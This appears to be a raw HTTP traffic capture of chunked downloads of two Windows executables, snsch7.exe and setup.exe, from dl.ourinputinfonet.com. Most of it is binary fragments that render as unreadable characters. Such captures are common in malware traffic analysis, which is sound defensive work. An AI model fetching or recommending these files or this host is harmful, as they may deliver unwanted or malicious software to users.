&xc. ?bA7.x.....u..a......5kt.6K...'f.....}.[.a.B.J.-5.B...#g.M<.Bq
|`..z......Hf....>..i....:....B{.y.=gZ...._.u....f._L..;...u....r..
.6,.........!wMO.FyI....8........O.q.3;...d.G..cj....T.....0:PM(J.<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=10000000-10182737

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=795

Content-Length: 182738

Content-Range: bytes 10000000-10182737/10182738

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
^.5.....2..6. .G.{.....6...`..y.J..|?I..xx.p.w ..c......%[email protected]<.&
lt;.jA.........4.`g........V-....d..|.9....2)...............^&..sB}.-^
......c..aE.Z........"...-S.L!P.*....7.DM....]..}.."[email protected]$d
..1.u.f.v.....`..'..uv.e..2..".G~]..S........\........\[.$Y..S[4Y.*.:k
...Yv./.....j...-....[]b...H.....Z....h)..S:,..Y.....(NJ..p.....q...d.
.F.......#....0..x2....e)..-...l"$f9.!'......0a..V_].}XF7...:.."....d.
.Y8d...P........F.i7.....Y...6.We>2.......8..uPxj....v...~....E....
.|.G.".N[.<.Z.z$p...Y...V...2[.3c............#.Wh..*..a..AP...1.i7$
.d...n}oQ..E.`. .Y.w.....#.F..r%(?...."....k.(-.......g}[email protected].
=....D,4x.8.-......m]K2..".$...Xf7...W..SJ,."Y...8.[...J.....[...W...T
T..{:....4..j.{kt.......<....>F...E..y2.......b.q`.E..'$...<.
..B.....f.n.yg...l..#FL4..O)..^...Sn.-`L=.O.Ky.8.d........]...&.:...xj
......).e.Z.TM0h..R......%....}.I...2..(D.`py]S}s4........\.Ff.....H7.
...r.HB..*.o.I.....d8.6_.=..R......Y........M_.....DkP.k.k.ma.....j..V
(.S...C......_A{x........_.:...'.X.@.....].L......X.b.F4T.~x.~....1...
.w.....5....F9.j.t .......U...X..N7{...O.._.8...d(..C......u.(._,.y...
....ku.b.VI...?..(.2... ..io..0(.^|DN..G....}[email protected]...~...b........
..{;.0.....1u.....$4......gN..o<.%..pJ....}m._...F.....9.i.-.z.q...
~Gq.._.hb0.2;.V5C.(k0..?y.uZ"s\.a.....Vz1]Tg(E........|..i.1....f....(
eoL...y.~...f.....t.KB.}.\).....~_........X.PW,e..Ky........... .Q.2=.
..... 7.N5:0.;6T..?..G!.x.,0......>o..}....Y.$K0.j..w.v../[email protected]..
.D....Y..H..L.Rx......M.1....N...{N.......g`?.....`kg....>....m<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=10250000-10499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive



R7.'g.......cY.Z.ND#.n.F.L.6.....t.9h.Z...f=....z.FD.f.h....{......o..
..LfIX..^y..A. K..G...".;oU.u.7..#^:._..M.V..r...z5....X=......(..`...
%....k...tp.Y.x..&'...."....nCQ.GUB..s.9m.....3.~E.J>.sZ..l.u.....6
.k.....8X.=m......k.C..C<.......dD.....:...........G4c.a% ..6.#u*.P
...`...[.m...{{.up)..m...(v4v.Aa......!.)K .y.z...t..?....4.....I\....
.t.....Ri.v......mKs..?J.j...g.>...]S.B.t.............<.F.Pw..1l
.."'.eC..o.^.<.z.RE...lr.c P{o.L..V.]g.......X..]s5....g`.....=....
.K.C...... . ...d...\ZG..*\.._....{._...!....)...\....b....:.7>WMD.
.....W. .#M..o>.2.d.<,PP}l....9..GZ..a.}&;..;..).m.N_.........V 
..O.s.=..%v......%.hYbqJC....b.L...8.*...........|..W<...}...c,.^ .
.......~...Vv.P<..~.w..%......=....T.88.9r.\..S..K...;...P <)..b
...Xy}..`...........g...`.f.9...V^=E0.H...'.n..........7<.....}./..
)......  D2cu........x.lom.5.c:...Z.0.....$ .........>.M.....s. 3..
%.....2;Q.C....m&..W......).N...D...c..- 8.e`.^.][.....P./...[.....!..
.N.....q...qi.(b3\........._.4_....b....lO.I...)E.?...cv..G.gFN.l..7..
...$...W=..xM........_...Mo.bUV.U!E9..'...=Q............?f".H..V..p...
.....1.........c.r..w..e.);a....i@N}..].........../)..`...3....#GZY...
...%.. ....._u..A..D..qS...?...l..!o...V....Y.*Yr.{.w..8e..E0~-N..I.{l
B......v../mj].....d..a.E)..?..A..1..)..O...T...!PU.4.>.(...6AM!.J 
.Y.l..Ll.@].m.....K.P.?j%t.l..*..8.....(.s`}.g....5../.u.~{....xX.zp..
;.C...yY.Y.B..h.<./G.B...$.D...LB...... ...5.....Tis...W.:.|..>[
K..#..*.........T<~.N.......N.... MXfpCQJ.'.D!D.n9..>p......<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=10750000-10834867

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=762

Content-Length: 84868

Content-Range: bytes 10750000-10834867/10834868

Content-Type: application/x-msdownload

X-HW: 1434694602.dop018.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
^...C.....A...W.tP...K...#...k..~..U[D..p..%[email protected].:n.W@....
.k.?...Wq.bhK"..k...N.(.&>r..V..9...5...$k..l).(T..g.......Z.x>S
..C}..'..I.*............./.....V....1....F9......mvTJ.t..J...{#.5.7.."
...w.K.&S_H.....m..."K{...Q ....:.E\-#pN....qH.J.w^.*n.;.}n.`...JA....
.......z0..P.hkJ;..osuTXV0<".*.....9........".....v.......N6..zR.m.
`.#.|.0A...=.`........`.....J..r-........igt..zWQ.o.}...(...b...R...-.
k.....m......^.b....;..y..T.Q1...u...ffW[@.z`.1.xO.Q.~.$....l.>.5C.
)....ma...w.....W...~.<..TTs..=.... .....e.i.-..866..:TQ..I...p....
...,.........H4....0..svl..5....5.^..........`.].i..... ".5.h.Ap......
`...#..v..I_kc..b".m.|.4.....?az....O\.....z..K7..I.;i..D.#..J........
1!bu........t........N.. .~....~K.Q.8..ko>.7D.....*..;$......s..QD/
=....<%.rm.)..=w..baT..9.{.d..%f,.2..q..G......<...Q.........`./
..Z..`.{Ob......7oG..a....P<;J.*........u..w...Dr.)..."4.......).?l
.k..G.......B...}......]....j.E.......t0p.........h.K..z.C..a.......v;
.."..g..!._x.<...........V/lkA........09Q...?....}{....'.F...B?P..1
.%1..].......N.U.....v...P...\0B*.r...A.8..b....y.-N1/v.-.6..;n..>A
.KEhL..@W l....*"]2h....x..;.....n.....B.Krz.}...R.....Q....#d........
.f0.....".S.2.z. .SvO..=^i..]..ie**...#5.Y.i.v...d...K.....,@.Z.B.Q.J.
......1J,1.7..I..."".|dg.....~...h\.zkeu......{kF.Kd..*.qW.C.c........
L....5......<...Ow.r.fN..J,q.tX.j.\...W=.........>@.E.Q... ..m_(
>)P...5#.t.o.p.................(~8..p.../.gb.....O.......0..m....m.
,.u........gqQ..d.........m.....1....!.bSj....".MJ.S.B.=BF.d?.`T..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:38 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=802

Content-Length: 250000

Content-Range: bytes 0-249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694598.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
......./........ ..............................p.......0..(C..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected]...(C.
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:38 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=802

Content-Length: 250000

Content-Range: bytes 250000-499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694598.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.gKx.....7......u.OQ............y{[DqL....P#!..."2.04..;,c...i[ 4..fdk
B ...:-".0.V..8.UB..WP...............fR..<>.>.\'K..V...`.e.~.
.w.([[G..Io.VX..|.'.g..U.F...;..... nG..........-`HE>..V...D...b...
w..`<.0 .&7..L......|xW..2I..P....[Cb.........x.v......,UN;\.&]....
~.qx..}lU...TD.v......,j..SNJ....,=.d..f9.;.G.7....Wg.<OEz..4......
S7<%.U.W......:P...R....._?g`'Y.V...r^..c..t....7...v...<bed J..
..)...w.-...Z..,.....A...L.UE]).*w.....C8.c....H.1.(.b.Am}..RA^.Oe*5..
/.....>[email protected]%..0...1'........h`...eN....Cv.....Ae<...`.f
.B$.x..m^.<.......V.$......?Sf..S....~..b..g...zC.`...n....!.R.d...
.w.ZT0.(3>..n~....3.z>...c.9.....R.....Ui..J.6.o...i|.p.\.......
y.;....#...sl....y..../.!..8i.".6...obx..Dm.,.W..x.?#.V....w...Y...{p.
....O.K.JfAa..#......UT.e.@..|"....~...:......|1.P.}...e-...B...."}G..
.....".......o.r5C([email protected]..{.....[5.....< .k...b.V..IT..O.Oa..{
B...q....A<Z..h'X....d.\wA..e...3e.5.....R...W&q..\.gM)3.......%..&
.....u...........pAt.|...L.~6..d...).LT"}D...(LPW$`l.e..#......;!"a=.&
gt;R.....rz.................{q....N..F....t.Ro...&...v-R94.....d..m...
nDb.-C.i#.-............T....%&.....f.0.f.7jq3.yY...*.......:...Pqs..z.
<.n.nz.<...qs.Y...~..3.'...#.l.)...y.XF|<7-.....%..".A...G..c
.r.af,rU....ph..,.{}P.4lZ...m^.Hd. |M.\....h..M...k.#xr\.($..cv.p....#
...d.......LV..I^.]0.....<.......6...D.......*(.....).........y.:..
d1..... ...i.zZ.L}.38.U..(a.'.t.........n..5.d(b$tC....Q.O...2..V...N.
Ox.^M.......D.A..XJ..!....r..?T$@....>.I.o/.a'.....u9..;.C.cT."<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:38 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=802

Content-Length: 250000

Content-Range: bytes 500000-749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694598.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
. ............,.(.#.....q...b.r....X.]}-2H.I..oq....v.....gd.c...mQ.V 
/.~.c....1.....`=.*.\o...>....`.0O.............../,.k........;H....
...W.lE..v`.....;.p.:.c..e..oM{v.P{.......|NN....c"9Jr.X......|o..%...
...1.c7P..........f.m..Pfa" P=...s...........?)Qb..M/.....A-.L..\.....
.C._~%...O.)..<"..j..f...Fo5....d....m.........&..@........([7F....
0'..[N3.H..%.k.D.VE?_uN.:.N....<]x.f...|=5.uc.d....>N.T.].!..;..
..G...Z8!......v. .j.~........^...u.7.....d.$#'^ $..... ..c3...E..l...
}.]......q.......[. .^...V93..eX..............XZ[f.'\u......<....Q.
v.......6F.? .U..K.5........u.88.F.L...P.9q.!I...9....l.......V.-.GJVZ
nrD/[email protected]..."..O.2.G.0>../!BD>_p=.q4...oh.
(.}....M.-..3..x...M.6...9...a......jZP..m............m....h6.bu.K..w.
.......DC^b)t.z....t.s...R,5..#PCF.. U.O.F.?c...#"x...9.I..9.v2.`...j.
.|&....].P....*KB..r.Y.[.-}[email protected].'_R.V..p.p..}Te.Ulk.e [email protected]
...e....^....H1......._.(.Z'4&..:.D..c.\T.w..w..N&.7Qi{a..x...H..3._..
.O......w..........X!.3&..............8%x....Szz:m.H.z.f.O........ .D&
gt;|[email protected]][?....``P.@]........\..T."y....{....:v..\..a..c...L.
..F6..'.n.`7.z..j.{...>.`.V..}.J...`../.qZ...x.P...Y.\7O.'...#&.,..
.&Q.*.T..r3/..{h.FhR....l ...<Y._...t.'.l.......$....Ry..r....2....
f{D....o{.........P....M.....g{H.......k..\.Ta._m*L.i.^...R.ddp..`M~.!
f..`..d."c.....o4..]4.`R.2...9N...u.(K....)...JM..M.qg)8<..".......
.Y..w..;...t).(0......0.n...(,...q.;.......eV],.....o.....R6.m.B....5O
.I[0.....<..P...,.BC]..).)..A.C P....p0o.?.?...)............S.b<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive



...../...!...%..xO-59.k.....#...rA^...`..)2.o.;..H......W......v*..n0.
l`.!u7_>D...r...Q...-..q'[email protected]...~.#..
~(..]o.........4.Ue..... w.m..V...`.~.........l.j..H.(...87../M.7p.Jo.
..Z..XiD.....<G.`.&Y.F.S.`.58.2....d.......].......W..1...7\?/.....
.x.Y#.9....}........Jo..v. ...H^"..pIu$..;......{..x ...T.......#...N.
._..i^^_*.<..zA...,M..|i..Rdd.Y.17.T..2 .. .b$..Y..h....F.|..\....&
...*.s....r...mM...V=j.65....Cx..........a...!/ ....z<Z.X.kjr.M.Jw.
.5.c&..F<.......n.*..C.K....<_...S.!5..1...z7<.U.Y...9..y"l.&
gt;......\......W..v.kl....z.m3.......&..K0.FA..............*.]S..'..R
9...s"v$Qn].{.....v...[.=9_.)5.P.A.M.u.a..6..N5?...~.k?..k...L........
.m]<T...j&...7...../>\.g......m"U...yT>..^.0}.4......~..*..{q
l.l..;XN..:..{.k.[..~tU&.L4f1~.^.C.....~.....b...9 .~_A._.79.A.......I
6.49H/pR..s_bt1......I4.a...>9.;..ud...d..........Hhq..'[email protected]
....8<...s9.;.1.:...H..7......U{.....z.<.....!kA.Si.ugZ.......@:
...K...Tb.2.......d&!........:....~.CZz...`s......<..L6.........^1.
9.Z.....V.`..s...v:.........|k.....D..:.t$.P0^..u.[...?.......L......v
...v...N..o.._."..%o=3.........:9.....`..e....u.~..ov<.a\H/A.I....B
#]..0.Z.&f2}.....?X.E\...r......(.=.k..a....EV.n..N.<..;.......%i1n
.V.k.. 2.Ns.a.C..-../.?..&$...V..7.:..7F...R.e.S....l"...Ra...v.aj.!..
.G-..7..\F........W7X.....` g.$.<.6.3=....wL...d..&j....=..Z.......
wJ.J1v...%s...99.0...a9.U%n....4..DN.ptn......T....K.`-..[..w...{..w$.
...|. g......}F...%....k..........a.3...~=Z..0...5>. 0...=.><<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=801

Content-Length: 250000

Content-Range: bytes 1250000-1499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694599.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.,.3TP..y].4 .....wH.......:...}..o.......8Q.."..h.'..Z....CU....T..Q.
.)AaxK.s,.....O.Y...q &.zy........e..0..............'z......^./...^.y2
...]...D...[."......|.M#.....d'[.s..<..~b.k...G..Z....8Uo....J...~.
...v.. .....tB.B.b1..}?.:BJ..3.@:..N.._.rU...OI...5....4........m...~.
}(K....:.E.Y....... L.Y......(G$...L..L^...8..Tq...lq>..m.*.......[
M.v...0w..).6..J6Fd...h..J...k..`...FbQ...`.m\*._.P....]..:R.. ).zQ'&F
....#frv.....f`.......q.N...Ut&$....0s.....\...L_R.N...i#.........#7Q.
.1H....H...C..<%.C..JS......[.5.m..%..$......m..7.B.N......D.msc...
N....S...Q....e...&RU]...H.vB.(.>...d.3..f.&.C.nB.8.0..8...Q....y$.
...oA..X...x..U.";.........Q.x..u.IADt..V.F*z....A.P..q.I...B..h.^py..
..Av!...^..CiF........;_.......WX.>...F..Jo..5.....[T.h5R.TN..!1...
x..4...~..G...z.?.h.q...4..L...@~...C......K*....GQf.9...V.....J..{...
.C}j..j.`.I..".s*$.... ...lU... .?..h.0'X2gZ.........z.n........h..1..
.y......k....V..^c...@jb^.......Z&.......D<.$..!.k..T_...).:t..a..{
V.T.HK]1.U.[GM.v1.aNKW. .W2....*.V...~= Vo..<Q....lJ..j..It.....e. 
.&.P.|...R.{`...........km..Y..LVfH..D....>..V....]....V.7dq..1.BX.
..\y.k...8....'.e.iPG.....B'..e.....{.._.k-.l2.O.J....gn.eX..U.. ...d.
"....`@Er9.<*yg..w.b..c....#l<r..#.9.....V._<.{-....~.u...X..
...........5....Q....}.c.........\}..K"auS[SOD.M..(R......=..%9..$.v..
..O&.yP.=..c.a..!.*.n#@.........8.....>..KW m..8Y........N..g.d..u:
.&..g8.2..I.H.3..5R.h.`.k.o....`....a.6.`N..<.x..Qt].%.L...F.VR....
W.U.......L.>T......#v.q.Yu.....9.&,*[email protected]../..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=801

Content-Length: 250000

Content-Range: bytes 1500000-1749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694599.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.3..#A...Y@}./.....6.6yN[.r#.s.....V&L......l......8...t.)oq.....a?-r.
C.^..!\....u......W............H....h.......q^.I..N.W...4..TP..,_...E.
.RA....Nj.{s..)Y..p.}....6r(w.B....d'.lc.MQ....R.5.R.......z.~.\..,...
w88.......7.A_<.Cd.....zE.......^G#...T.Ax..j....#.....B.m.I..z....
..............<....F.........T)-a&.Y.\<U.`.U.m:..#Y..8.._.(../mH
xK.......KbN....rW|.DtUL......(U.z........_..i....H..O?U..M..u.r.B.?S.
...WH...^.w..Q.&....O*Z..[v. ,$......=.H?..r..WI..5|v.......cs..r.a!w.
.O.Ka."*...,W..D..a&.....Xw..xD..U.....L*.....T....c...r....no.43.8^I.
nv./z.|..2..t.e..o.bW.R..V......K..B..... .7..*[email protected].]z.
B..2.............q....7..r.b..........Jw..q50.C........^7....zH..?....
\[email protected]..:...PR.B.}..)...3u.
.....@....#V...jX.;O.....F.Ef..2.E .d..DiWl...wT..q...m.. . !,Q...g...
V.,.....0|8...=...*qk.G...#pfT......~........_H....v.v...^.>}C.....
..Y..F........(.~..FF...8....#.y..d.]W..S:J.z....]m..........?.W. ...%
.%.8......k.V.VO.).(n..a./..>....FG4.x.r..........y...i~.*....D6;..
....b1...B...gc...._....).._.....H...A...l...........\p*..?..b......!.
3...;].........c..J..U..^..A.....>..c....7.......j..........T.. .kj
........Cl....k]....=...>n.[.F.b.o)`w^...S[....{..|...$...'..t3.6.8
..![.........`..:[email protected]#.L.B. ..nZ...X|....{.8.......d..
.C4yE..#..hD.}:.14..K...,lb....=...k.._Ho.(6......}..VBSH.\.S}&.W[d...
...#I...d..1<.D...K9...D.K"...w?;._0?..8....>....=.m1....z.4..~.
.I..9....\.%[email protected].\@..4.cU].z!.{m..*..z..Y......Q..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=801

Content-Length: 250000

Content-Range: bytes 1750000-1999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694599.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
k......."...X\c.<.ia..*8]......'...E-X...?..V.B..&0.....[..L.a..iE[
....q.~XO.q...Xv6W..F....RR:.n.@.[Z...Mz...TEC..^)E...e..o.@.&E.Y...Y.
n.....9.i..I.s..I.._~..a....1;.2u..p..|[email protected]".O.K..e.
h.r...._3....C\...?..R.X....T.I..=&.[*..0...f.*6T....}.._.qIo.X6-...a.
T.......;[email protected][email protected].>..A...wH...4-1.!}<]
1.....KkTgy..u#.%-9...UB...qfat....7..).x....*.R..~.;1.Io.o.`........Y
..G.]...[<.....e..H....a....<.....6..!.i.........(....]......?.~
=..`^[email protected]=EZ.f..`6..K...osq]....Kf.. xD.D. 6.
....i.n&<~Y.....H....../....1.......|...a....- ...].7..-.....>..
.rAR...KH#.....neq..~..8j:.....`.Y..W..f..|.ne#-.H....n.=.M.C..L3.3..)
.kQ.$ .)[email protected].^.6.q*.W.JF..F.MrqL"..
v ..'..q.......f..[a....>......|....6.....q=...,..".,.>.;]n|n..O
K.....6..P.mCt..":.....5.p>...#.k.Q.LY4!.G..C..0Cr.O.... _B/>Zi.
`o......L5.i........s.[.*.../L.G..=..7..y.$L..k.j<...).RTk..]b.....
.....F?.-.._....H`.n.u...s..... ...s'.V.g.!..p.^.....FN..-S.....bh..c.
..7.X..e.bJZbZ1,...d...>.."n.L......b..~...=O%.......*..(.-%U...>
;.........6.i48O.c.r.e.q.............I...M2....d.\...5E...8b@.\X...tYP
'..9.6P..-?...y}3f...<....J..=..E...s.1..a'.2...y.>.e.J..M.3.W-.
................E.P.6&<D....M...D..W....y...q............ ..]....7.
)b*c..\Nba..t...a...).(M.}..Y.._..}&..'. ...{...h.8.....'\.i.[T..&.X.@
..j..Gwl.zu..XR'c{DW.6....Z..!....e...^...M..IxZ#..c...........Qe..`fa
......rJ....."...M.&......X~1s....<5...M,.....xd.'.......E%....<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=801

Content-Length: 250000

Content-Range: bytes 2000000-2249999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694599.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
TE...4..&......Vs.....,p..K=\k=c].95.P.F......i..9.G>[email protected]."(~...
].7.Y.q...v?...y.v........~...8..P..1..Q.Mu.g........y-...H.0.Y...%...
.$......!.....X.).C.b ....oG]6S..{d .&.Q....:Q.H.......)|V....j8)..<
;.\: ...V.<.zH...E_._~..&7q:0p.O.=....qn.u..<..t.........-l.u.AD
z.I}.......H..n.1..."..b..".y......q..lM.Irn..,../|..o4.'.6%...h....(.
L..M.&...B.SG......e....I....0..3.?..L...oRXm"f8..o...2..9...C...nnAE.
..... ..!V..5l*.s.@E.?Vs_"4rv........OOg.................z%ds{].r...P.
9.^...&q1|o.X.'.........h2i?..6...5.h...A.1...i\.'T~.._.G_#.f....K*`T.
#.K...`....Lo.j..../.M... ...N5~..zh.)6].{..d....Z.....w.K.P?'..i..$L.
..G...o.E9../.auZUJ...o..C`......,@;...X]....J.NT.....vP....:.a.)u5.Z[
...O...e.u=.q..Lxo...6@......:.|..u!/...=..T.L..6...|d.f...##..t!/.J..
.Z%..6`.4.&.#....R1...\}..bq4O?....8?..v...E5.....$.a.4.-K.*h....v..DA
$......z.j.....L.`..f...L.}...%..).....v...J."...9w..:..& ....9/......
..i._..(..v..|......4.......}.d&....H.....X...^V.,s....z..a0.....W.#..
.6.!...{.L$..*HW8.AO.=.K..]1...A.X<...`...0.*9G..X.P..`.66Z.......k
O....I....J^......#..*^(.*.5r....roY.....,X...cW1.:}..Y.....7..I......
[F......L.BPok...v..`...1.H.........IIY........p.6,.T`..px...S.*.G4...
8...4.$...N..x..7... .R.>.X..'...".c^..nf.C..#....<Q.T....Y.....
..j7..s..y.....jP....qr.`o_[\N....x....n..3>u...'..dI..,.h...oh..Wn
*.q4v..0..tR;[J4v...../..4c.......$8..g;..U.n....7lW...0q.Z..\E.o..6*.
.F.0........nU.1..". 3..vxk... /...W.AEZ......N..cw..w...K....cG......
.W.|.....z?...;..;.N.Y....< $b?...q. .z...q......0....gf.\7....<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:39 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=801

Content-Length: 250000

Content-Range: bytes 2250000-2499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694599.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.....N.B.p.6...M.yJB..Thm./...!.!....<l.L2O%.hN_^..F....>L"....X
..e.M.J, x........^....... >)R=;.......Z<....Ky..Sq6.b...0L..z.Y
....9Q\..x.0....}..A...:.>E..E..-...A.Q. F.-..}x.%.., .e.....a._...
..K...y..E@....=.<l./.Q.E...F.xt..<.X%A..LB.]..F...*W..s.q.y...V
.{..*>!..Z.....~......96....F.r..85...".........?..$...Q.....t..pb.
$.vkX.6..6g... ........v0.......S...RC..f.2.q,..RN...?..'./...P..Mi:up
..{.i.....(..g.`..Q..s........)..m.q...\e ;... .=....5lO...y.....`q.GJ
.Q...........4..'.FE0.....9....n.#.S/...j...,...Z.N...5..s.....]..7k;n
K...G"...|......h..4...w..r(. ..h..@A,285...{...F.S."....n...w.."J.Z..
D....8q.H.hn.G2.,L.D......wI]}.........~.{%..!..o'.;...E8.cu..i....EB-
k..jU&..z..d. .cGfdx...f9..(..o$..........>HC.b^.....G.......{.-ri.
_.........X...e....P........s.OU.;..W..1..f..lt..0o...,.BX. ...E.S.M..
....h..v.m..|qV.M-]............'".r.[..v..}3...~a.|M7..........6..g..G
.O........... ...F.@....,.1tR...D[.r...6..|E....}.41.Z.....70.....Km..
pv8\bo,......L...i.o...C.Q...x..5vC.vOE)...(i^.8..7..~....R z....~....
....}.([..z..R...r.UH......E..JK...%X.....5t#0..Ajv...G...f.w.p..}...5
.d..5..v6'Z..5..(n...../....}.C..&..j......k.............m..p..J.n..K.
.......yI....{?8C.~.....E.H.T...P.....s....{2..wQp.J"T.;eZ...X|.".....
.....p.x....8...6....WlA~..UC.S....j.w..h....5.:...Q.I.i...'.......<
;..`..^....Z....."y.~........'qe...2..4.~V.~........L(. ......7....]W.
HHy.D.UQ.M.j.A.S.a'.P_Hv..=..8...h.7oS.;..Y'...8. .p..........;.\.@.&g
